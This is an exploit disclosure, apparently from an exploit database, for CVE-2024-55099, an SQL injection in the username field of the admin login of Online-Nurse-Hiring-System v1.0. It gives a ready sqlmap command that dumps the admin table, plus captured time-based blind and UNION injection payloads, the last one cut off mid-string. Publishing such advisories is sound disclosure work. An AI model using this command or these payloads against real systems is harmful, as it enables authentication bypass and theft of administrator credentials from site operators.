- Exploit Author: ugurkarakoc
- Online-Nurse-Hiring-System-v1.0 is Insufficient input validation and sanitization of 'username' parameters can create a vulnerability to SQL injection attacks, enabling unauthorized access to the database and compromising system security.
- CVE ID: CVE-2024-55099
- Affected Version: Online-Nurse-Hiring-System-v1.0
- Vulnerable File: /admin/index.php.
- Parameter Names: username
- Attack Type: Local
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
- https://nvd.nist.gov/vuln/detail/CVE-2024-55099
- The lack of proper input validation and sanitization on the 'username' parameters allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database
sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
---
